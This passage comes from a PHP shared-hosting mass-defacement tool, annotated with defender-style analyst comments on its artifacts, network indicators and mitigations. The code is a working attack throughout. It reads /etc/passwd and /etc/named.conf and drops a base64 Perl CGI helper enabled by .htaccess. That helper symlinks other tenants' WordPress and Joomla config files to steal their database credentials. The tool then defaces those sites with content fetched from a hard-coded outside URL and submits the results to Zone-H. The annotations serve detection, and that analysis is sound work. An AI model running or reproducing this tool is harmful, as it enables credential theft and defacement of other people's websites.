  483. echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';
  484. $j = 1;
  485. $map = array();
  486. foreach($out as $d) {
  487. $info = @posix_getpwuid(fileowner("/etc/valiases/".$d));
  488. $map[$info['name']] = $d;
  489. }
  // Base64 literal that is decoded and written to plsym/plsym.cc below. In this
  // listing the paste's gutter numbers fall inside the literal; the decoded
  // content is not analysed in this note.
  490. $dt = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCiAgICAkbXNyID0gcXh7cHdkfTs
  491. NCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2
  492. h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19od
  493. G1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwv
  494. YmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRklMRSwgJy9ldGMvcGFzc3d
  495. kJyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPCR5OyRrYSsrKXsNCiAgIC
  496. B3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==';
  497. mkdir('plsym',0777);
  498. file_put_contents('plsym/plsym.cc', base64_decode($dt));
  499. chmod('plsym/plsym.cc', 0755);
  // This .htaccess only takes effect where the server lets per-directory files
  // change Options and handlers; that is the control point for prevention.
  500. $wr = "Options FollowSymLinks MultiViews Indexes ExecCGI\n\nAddType application/x-httpd-cgi .cc\n\nAddHandler cgi-script .cc\nAddHandler cgi-script .cc";
  501. $fp = @fopen ('plsym/.htaccess','w');
  502. fwrite($fp, $wr);
  503. fclose($fp);
  // The helper is run by requesting it through the local web server, then
  // removed; the directory and its other contents are left in place.
  504. $res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc');
  505.  
  506. $url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';
  507. unlink('plsym/plsym.cc');
  // Relies on an auto-generated directory index for plsym/ to enumerate files.
  508. $data = file_get_contents($url);
  509. preg_match_all('/<a href="(.+)">/', $data, $match);
  510. unset($match[1][0]);
  511. $i = 1;
  512. foreach($match[1] as $m)
  513. {
  514. $mz = explode('##',urldecode($m));
  515. $config01 = '';
  516. $config02 = '';
  517. if($mz[1] == 'joomla.txt') {
  518. $config01 = file_get_contents($url.$m);
  519. }
  520. if($mz[1] == 'wordpress.txt') {
  521. $config02 = file_get_contents($url.$m);
  522. }
  523. $domain = $map[$mz[0]];
  524. $cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
  525.  
  526. if($config01 && preg_match('/dbprefix/i',$config01)){
  527. echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i++.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
  528. echo '<td align="center"><font color="pink">JOOMLA</font></td>';
  529. $res = index_changer_joomla($config01, $def, $domain);
  530. echo '<td>'.$res['output'].'</td>';
  531. if($res['cond']) {
  532. echo '<td align="center"><span class="green">DEFACED</span></td>';
  533. fwrite($output, 'http://'.$domain."<br>");
  534. $count1++;
  535. } else {
  536. echo '<td align="center"><span class="red">FAILED</span></td>';
  537. }
  538. echo '</tr>';
  539. }
  540.  
  541. if($config02 && preg_match('/DB_NAME/i',$config02)){
  542. echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
  543. echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
  544. $res = index_changer_wp($config02, $def);
  545. echo '<td>'.$res['output'].'</td>';
  546. if($res['cond']) {
  547. echo '<td align="center"><span class="green">DEFACED</span></td>';
  548. fwrite($output, 'http://'.$domain."<br>");
  549. $count2++;
  550. } else {
  551. echo '<td align="center"><span class="red">FAILED</span></td>';
  552. }
  553. echo '</tr>';
  554. }
  555. }
  556. echo '</table>';
  557. echo '<hr/>';
  558. echo 'Total Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';
  559. echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';
  560. if($count1+$count2 > 0){
  561. echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';
  562. }
  563. }
  564.  
  // Analysis note (defender view). Same flow as exec_mode_2() -- domain/account
  // map, dropped `plsym/plsym.cc` CGI helper enabled through a per-directory
  // .htaccess, directory-index scrape, then index_changer_* per config found --
  // with one difference: the request body field `man_data` is written verbatim
  // to `plsym/data.txt` before the helper runs.
  // Artifacts: `plsym/data.txt` in addition to the exec_mode_2() set (`plsym/`
  // directory, .htaccess enabling CGI for `.cc`, `##`-named entries,
  // `defaced.html`, self-request for /plsym/plsym.cc), plus a POST carrying
  // `man_data` to this script.
  // Mitigations are the same: no Options/handler overrides from .htaccess, no
  // ExecCGI or directory indexes for tenant content, SymLinksIfOwnerMatch, and
  // owner-only permissions on CMS config files.
  565. function exec_mode_3($def_url) {
  566.  
  567. $domains = @file_get_contents("/etc/named.conf");
  568. @preg_match_all('/.*?zone "(.*?)" {/', $domains, $out);
  569. $out = array_unique($out[1]);
  570. $num = count($out);
  571. print("Total domains: $num<br><br />");
  572.  
  573. $def = file_get_contents($def_url);
  574. $def = urlencode($def);
  575.  
  576. $output = fopen('defaced.html', 'a+');
  577. $defaced = '';
  578. $count1 = 0;
  579. $count2 = 0;
  580. echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';
  581. $j = 1;
  582. $map = array();
  583. foreach($out as $d) {
  584. $info = @posix_getpwuid(fileowner("/etc/valiases/".$d));
  585. $map[$info['name']] = $d;
  586. }
  // Base64 literal decoded and written to plsym/plsym.cc below. The paste's
  // gutter numbers fall inside the literal in this listing; the decoded content
  // is not analysed in this note.
  587. $dt = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCiAgICAkbXNyID0gcXh7cHd
  588. kfTsNCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcH
  589. VibGljX2h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL
  590. 3B1YmxpY19odG1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicv
  591. cHVibGljX2h0bWwvYmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRkl
  592. MRSwgJ2RhdGEudHh0Jyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPC
  593. R5OyRrYSsrKXsNCiAgICB3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==';
  594. mkdir('plsym',0777);
  // Request-supplied data is stored unvalidated next to the helper script.
  595. file_put_contents('plsym/data.txt', $_POST['man_data']);
  596. file_put_contents('plsym/plsym.cc', base64_decode($dt));
  597. chmod('plsym/plsym.cc', 0755);
  598. $wr = "Options FollowSymLinks MultiViews Indexes ExecCGI\n\nAddType application/x-httpd-cgi .cc\n\nAddHandler cgi-script .cc\nAddHandler cgi-script .cc";
  599. $fp = @fopen ('plsym/.htaccess','w');
  600. fwrite($fp, $wr);
  601. fclose($fp);
  // Helper is run via a request to the local web server, then deleted.
  602. $res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc');
  603.  
  604. $url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';
  605. unlink('plsym/plsym.cc');
  606. $data = file_get_contents($url);
  607. preg_match_all('/<a href="(.+)">/', $data, $match);
  608. unset($match[1][0]);
  609. $i=1;
  610. foreach($match[1] as $m)
  611. {
  612. $mz = explode('##',urldecode($m));
  613. $config01 = '';
  614. $config02 = '';
  615. if($mz[1] == 'joomla.txt') {
  616. $config01 = file_get_contents($url.$m);
  617. }
  618. if($mz[1] == 'wordpress.txt') {
  619. $config02 = file_get_contents($url.$m);
  620. }
  621. $domain = $map[$mz[0]];
  622. $cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
  623.  
  624. if($config01 && preg_match('/dbprefix/i',$config01)){
  625. echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.($i++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
  626. echo '<td align="center"><font color="pink">JOOMLA</font></td>';
  627. $res = index_changer_joomla($config01, $def, $domain);
  628. echo '<td>'.$res['output'].'</td>';
  629. if($res['cond']) {
  630. echo '<td align="center"><span class="green">DEFACED</span></td>';
  631. fwrite($output, 'http://'.$domain."<br>");
  632. $count1++;
  633. } else {
  634. echo '<td align="center"><span class="red">FAILED</span></td>';
  635. }
  636. echo '</tr>';
  637. }
  638.  
  639. if($config02 && preg_match('/DB_NAME/i',$config02)){
  640. echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
  641. echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
  642. $res = index_changer_wp($config02, $def);
  643. echo '<td>'.$res['output'].'</td>';
  644. if($res['cond']) {
  645. echo '<td align="center"><span class="green">DEFACED</span></td>';
  646. fwrite($output, 'http://'.$domain."<br>");
  647. $count2++;
  648. } else {
  649. echo '<td align="center"><span class="red">FAILED</span></td>';
  650. }
  651. echo '</tr>';
  652. }
  653. }
  654. echo '</table>';
  655. echo '<hr/>';
  656. echo 'Total Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';
  657. echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';
  658. if($count1+$count2 > 0){
  659. echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';
  660. }
  661. }
  662.  
  /**
   * Analyst note: verification-and-reporting stage of this tool.
   *
   * Reads the host list from `defaced.html` (relative path, so resolved against
   * the working directory), re-fetches every listed host over HTTP and keeps the
   * ones whose response contains the marker string '3xp1r3'. The confirmed and
   * unconfirmed hosts are written to `org_def.html` and `fail_def.html`, and the
   * confirmed ones are then POSTed to http://www.zone-h.com/notify/mass, ten
   * hosts per request and up to three requests at a time via curl_multi.
   *
   * Takes no parameters and returns nothing; progress is echoed as HTML.
   *
   * Detection points visible in this function:
   *  - file artifacts `defaced.html`, `org_def.html`, `fail_def.html` next to the script;
   *  - outbound HTTP from the web server to every listed host and to zone-h.com,
   *    the latter with a fixed Firefox/11.0 User-Agent;
   *  - the static strings `defacer=AHS-CREW` and `hackmode=14&reason=5&submit=Send`
   *    in the POST body.
   */
  663. function submit_zone_h() {
       // defaced.html is treated as a `<br>`-separated URL list. The last element of
       // the split is dropped — presumably the empty tail after a trailing `<br>`;
       // the code that writes this file is outside this view.
  664. $items = explode("<br>", trim(str_replace("\n",'',file_get_contents('defaced.html'))));
  665. unset($items[sizeof($items)-1]);
  666. $items = array_unique(str_replace('http://','',$items));
  667. $total = count($items);
  668.  
  669. echo '<h3 style="text-align: center;">Checking Defaced sites</h3>';
  670. echo "Total unique domain: $total<br /><br />";
  671. echo '<table style="width:50%;">';
  672. echo '<tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>DID</th><th>Domain</th><th>Status</th></tr>';
  673. $j = 1;
  674. $dc = 0;
  675. $sites = array();
  676. $prob_s = array();
  677. foreach($items as $s) {
       // One outbound GET per list entry, issued by the web server itself.
       // file_get_contents() on an http:// URL only works while allow_url_fopen is
       // enabled, so that setting and egress filtering both constrain this step.
  678. $data = file_get_contents('http://'.$s);
       // '3xp1r3' is the marker this tool uses to decide a page was altered; it is
       // usable as a content signature when scanning hosted sites.
  679. $cond = strpos($data, '3xp1r3');
  680. $cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
  681. if($cond !== false){
  682. echo '<tr '.$cls.'><td>'.$j.'</td><td>'.($dc+1).'</td><td><a href="http://'.$s.'" target="_blank">'.$s.'</a></td><td><span class="green">DEFACED</span></td></tr>';
  683. $sites[] = $s;
  684. $dc++;
  685. } else {
  686. echo '<tr '.$cls.'><td>'.$j.'</td><td>&nbsp;</td><td><a href="http://'.$s.'" target="_blank">'.$s.'</a></td><td><span class="red">NOT DEFACED</span></td></tr>';
  687. $prob_s[] = $s;
  688. }
  689. $j++;
  690. }
  691. echo '</table><br />';
       // Result lists are written beside the script; for responders they are a
       // ready-made inventory of affected and unaffected hosts if still on disk.
  692. file_put_contents('org_def.html','http://'.implode('<br/>http://',$sites));
  693. file_put_contents('fail_def.html','http://'.implode('<br/>http://',$prob_s));
  694. $total = $dc;
  695. echo '<h3 style="text-align: center;">Total Defaced = '.$total.'</h3>';
  696. echo '<h3 style="text-align: center;"><a href="org_def.html" target="_blank">Originaly Defaced Sites List</a>&nbsp;|&nbsp;<a href="fail_def.html" target="_blank">Failed Defaced Sites List</a></h3><br />';
  697. echo '<h3 style="text-align: center;">Submitting to Zone-H</h3>';
  698. echo '<table style="width:50%;">';
  699. $main=curl_multi_init();
  700. $pause=10;
  701.  
  702. for($m=0;$m<3;$m++) { $http[] = curl_init(); }
  703.  
       // Confirmed hosts are processed 30 at a time: three requests of ten hosts each.
  704. for($n=0;$n<$total;$n +=30) {
  705. for($x=0;$x<30;$x++) {
  706. if($sites[$n+$x]!='') {
  707. echo'<tr class="even"><td>'.rtrim($sites[$n+$x]).'</td><td>DONE!!!</td></tr>';
  708. }
  709. }
  710. $d=$n+30;
  711. if($d>$total){$d=$total;}
  712. echo '<tr class="odd"><td colspan="2" style="text-align:center;">'.$d.' of '.$total.' Done</td></tr>';
  713.  
  714. for($w=0;$w<3;$w++) {
  715. $p=$w * 10;
       // $pause records how many handles were actually filled for this batch.
  716. if(!(isset($sites[$n+$p]))){$pause=$w;break;}
       // The body is assembled by plain concatenation and, as written, starts with
       // the literal `defacer=AHS-CREWdomain1=`; that prefix and the trailing
       // `hackmode=14&reason=5&submit=Send` are static strings for proxy/IDS matching.
  717. $posts[$w]="defacer=AHS-CREWdomain1=http%3A%2F%2F".rtrim($sites[$n+$p])."&domain2=http%3A%2F%2F".rtrim($sites[$n+$p+1])."&domain3=http%3A%2F%2F".rtrim($sites[$n+$p+2])."&domain4=http%3A%2F%2F".rtrim($sites[$n+$p+3])."&domain5=http%3A%2F%2F".rtrim($sites[$n+$p+4])."&domain6=http%3A%2F%2F".rtrim($sites[$n+$p+5])."&domain7=http%3A%2F%2F".rtrim($sites[$n+$p+6])."&domain8=http%3A%2F%2F".rtrim($sites[$n+$p+7])."&domain9=http%3A%2F%2F".rtrim($sites[$n+$p+8])."&domain10=http%3A%2F%2F".rtrim($sites[$n+$p+9])."&hackmode=14&reason=5&submit=Send";
       // Fixed User-Agent and destination URL: both are stable network indicators
       // for traffic originating from a web server.
  718. $curlopt=array(CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0',CURLOPT_RETURNTRANSFER => true,CURLOPT_FOLLOWLOCATION =>true,CURLOPT_POST => true, CURLOPT_URL => 'http://www.zone-h.com/notify/mass',CURLOPT_POSTFIELDS => $posts[$w]);
  719. curl_setopt_array($http[$w],$curlopt);
  720. curl_multi_add_handle($main,$http[$w]);
  721. }
  722.  
  723. $running = null;
       // Polls curl_multi_exec() repeatedly until no transfer is still running.
  724. do{
  725. curl_multi_exec($main,$running);
  726. } while($running > 0);
  727.  
  728. for($m=0;$m<3;$m++) {
  729. if($pause==$m){break;}
  730. curl_multi_remove_handle($main, $http[$m]);
  731. $code = curl_getinfo($http[$m], CURLINFO_HTTP_CODE);
  732. if ($code != 200) {
       // Retries every 5 seconds with no upper bound until the endpoint answers 200.
       // Together with set_time_limit(0) at the top of the file the request can run
       // indefinitely, so a long-lived PHP worker is a useful host-side signal.
  733. while(true){
  734. echo'<tr class="odd"><td colspan="2" style="text-align:center;">Server Error Retrying...</td></tr>';
  735. sleep(5);
  736. curl_exec($http[$m]);
  737. $code = curl_getinfo($http[$m], CURLINFO_HTTP_CODE);
  738. if( $code== 200){break 1;}
  739. }
  740. }
  741. }
  742. }
  743. echo '<tr class="odd"><td colspan="2" style="text-align:center;">Finished!!</td></tr></table>';
  744. echo '<h3 style="text-align: center;"><a href="org_def.html" target="_blank">Originaly Defaced Sites List</a>&nbsp;|&nbsp;<a href="fail_def.html" target="_blank">Failed Defaced Sites List</a></h3><br />';
  745. curl_multi_close($main);
  746. }
  747.  
  /**
   * Recursively deletes a directory and everything beneath it.
   *
   * Analyst note: this is the helper behind the tool's cleanup routine. Both
   * unlink() and rmdir() are called with `@`, so failures are silent and a
   * partially removed tree is possible. filetype() reports a symbolic link as
   * "link", not "dir", so a symlink that points at a directory is unlinked
   * rather than descended into; the link target is left alone.
   *
   * @param string $path Directory to remove, with or without a trailing slash.
   */
  748. function deleteDir($path) {
       // Normalise to a trailing slash so entries can be appended directly.
  749. $path = (substr($path,-1)=='/') ? $path:$path.'/';
  750. $dh = opendir($path);
  751. while(($item = readdir($dh))!==false) {
  752. $item = $path.$item;
       // Skip the self and parent entries so the walk stays inside $path.
  753. if((basename($item) == "..") || (basename($item) == ".")) continue;
  754. $type = filetype($item);
  755. if ($type == "dir")
  756. deleteDir($item);
  757. else
  758. @unlink($item);
  759. }
  760. closedir($dh);
  761. @rmdir($path);
  762. }
  763.  
  /**
   * Cleanup routine, reached from the request dispatcher at the bottom of the
   * file when `kill=1` is present in the query string.
   *
   * Analyst note: removes the `sym` directory and the three result lists under
   * $base_path (a global assigned outside this view), prints a confirmation and
   * exits. Nothing in this function deletes the script file itself or touches
   * server logs, so the script and the access-log entry for the `kill=1` request
   * remain available to responders; backups or filesystem snapshots may still
   * hold the removed lists.
   */
  764. function kill_me() {
  765. global $base_path;
  766. deleteDir($base_path.'sym');
  767. unlink($base_path.'defaced.html');
  768. unlink($base_path.'org_def.html');
  769. unlink($base_path.'fail_def.html');
  770. echo '<h1 style="text-align:center">All File Deleted</h1>';
  771. exit;
  772. }
  773.  
  // Analyst note: operator UI and request dispatcher.
  // The page title, the <h2> heading and the footer text below are static strings
  // and can serve as content signatures when hunting for this file in web roots.
  // $_GET['pass'] is echoed unescaped into the "Delete All Files" link and travels
  // in the query string, so the access password shows up in access logs. In this
  // copy $auth_pass is empty, so the login gate at the top of the file admits
  // every visitor.
  774. echo '<!DOCTYPE html>
  775. <html>
  776. <head>
  777. <title>Joomla ~ Wordpress Mass Defacer</title>
  778. <style type="text/css">
  779. body {color: white; background: #000 url(http://sphotos-f.ak.fbcdn.net/hphotos-ak-prn1/65176_115131175320548_863165804_n.jpg) no-repeat 50% 50%;font-family: "Trebuchet MS",Arial;background-attachment:fixed;margin:0;padding:0;}
  780. .header {position:fixed;width:100%;top:0;background:#000;}
  781. .footer {position:fixed;width:100%;bottom:0;background:#000;}
  782. input[type="submit"]{background-color:rgba(25,25,25,0.6);font-size: 45px;font-weight:bold;color: red;font-family: Tahoma; border: 1px solid #666666;height:100px;width:250px;}
  783. input[type="submit"]:hover{color:SeaShell;}
  784. input[type="radio"]{margin-top: 0;}
  785. .even {background-color: rgba(25, 25, 25, 0.6);}
  786. .odd {background-color: rgba(102, 102, 102, 0.6);}
  787. a {color:#fff;} a:hover {color:#00BFFF;}
  788. fieldset{border: 1px solid grey; background: rgba(0,0,0,0.7); width: 600px; margin: 0 auto;min-height:240px;}
  789. textarea{background: rgba(0,0,0,0.6); color: white;}
  790. .green {color:#00FF00;font-weight:bold;}
  791. .red {color:#FF0000;font-weight:bold;}
  792. .killme {position: fixed; top: 20px; right: 20px; border: 2px solid yellow; padding: 10px; font-size: 20px; color: red; font-weight: bold;}
  793. </style>
  794. <script type="text/javascript">
  795. function change() {
  796. if(document.getElementById(\'rcd\').checked == true) {
  797. document.getElementById(\'tra\').style.display = \'\';
  798. } else {
  799. document.getElementById(\'tra\').style.display = \'none\';
  800. }
  801. }
  802. function hide() {
  803. document.getElementById(\'tra\').style.display = \'none\';
  804. }
  805. </script>
  806. </head>
  807. <body>
  808. <div class="header">
  809. <h1 style="font-family: cursive;text-align: center;"></h1>
  810. <a class="killme" href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&kill=1">Delete All Files</a>
  811. </div>
  812. <div class="footer">
  813. <h3 style="text-align: center;">&copy; Albanian Hackers Security.</h3>
  814. </div>
  815. <div style="background: rgba(0,0,0,0.5);padding:90px 0 65px 0;">
  816. <h2 style="color:green;text-align: center;">/Wordpress and Joomla Mass Defacer\</h2>';
       // The mode form is shown only when no action parameter is present. The two
       // is_readable() probes in it report whether the PHP process can read
       // /etc/named.conf and /etc/passwd; per-account confinement of PHP (for
       // example open_basedir) is what makes them come back NOT READABLE.
  817. if(!isset($_POST['form_action']) && !isset($_GET['zh']) && !isset($_GET['mode']) && !isset($_GET['kill'])){
  818. echo '<div align="center">
  819. <form action="" method="post">
  820. <fieldset>
  821. <table>
  822. <tr><td><input type="radio" value="1" name="mode" checked="checked" onclick="hide();"></td><td>PHP based whole server symlink and using /etc/named.conf ('.(is_readable('/etc/named.conf')?'<span class="green">READABLE</span>':'<span class="red">NOT READABLE</span>').')</td></tr>
  823. <tr><td><input type="radio" value="2" name="mode" onclick="hide();"></td><td>PERL based direct symlink and using /etc/passwd ('.(is_readable('/etc/passwd')?'<span class="green">READABLE</span>':'<span class="red">NOT READABLE</span>').')</td></tr>
  824. <tr><td><input type="radio" value="2" name="mode" id="rcd" onclick="change();"></td><td>PERL based manual symlink with manual copy of /etc/passwd</td></tr>
  825. <tr><td></td><td><center>Created by d00mAHS</center></td></tr>
  826. <tr><td></td><td><center>Credits to : 3CA</center></td></tr>
  827. <tr><td></td><td><center>facebook.com/r00t.aHs</center></td></tr>
  828. <tr id="tra" style="display: none;"><td></td><td><textarea cols="40" rows="5" name="man_data"></textarea></td></tr>
  829. </table>
  830. </fieldset>
  831. <br />
  832. <input type="hidden" name="form_action" value="1">
  833. <input class=submit type="submit" value="m4ss!" name="Submit">
  834. </form>
  835. </div>';
  836. }
  837. echo '<div align="center">';
       // Dispatch on request parameters. exec_mode_1/2/3 are defined outside this
       // view; each receives the same hard-coded remote URL, presumably the page
       // content the tool plants. The URL is a network indicator, and whether its
       // host is itself a compromised third party cannot be told from here.
  838. if($_POST['form_action'] == 1) {
  839. if($_POST['mode']==1) { exec_mode_1('http://balarama108.com/wp-content/themes/twentyten/index.txt'); }
  840. if($_POST['mode']==2) { exec_mode_2('http://balarama108.com/wp-content/themes/twentyten/index.txt'); }
  841. if($_POST['mode']==3) { exec_mode_3('http://balarama108.com/wp-content/themes/twentyten/index.txt'); }
  842. }
       // GET-driven actions: `zh=1`, `mode=1` and `kill=1` appear in the query
       // string together with `pass=`, which makes them searchable in access logs.
  843. if(isset($_GET['zh']) && $_GET['zh']==1) { submit_zone_h(); }
  844. if($_GET['mode']==1) { exec_mode_1('http://balarama108.com/wp-content/themes/twentyten/index.txt'); }
  845. if(isset($_GET['kill']) && $_GET['kill']==1) { kill_me(); }
  846. echo '</div>
  847. </div>
  848. </body>
  849. </html>';
  850. }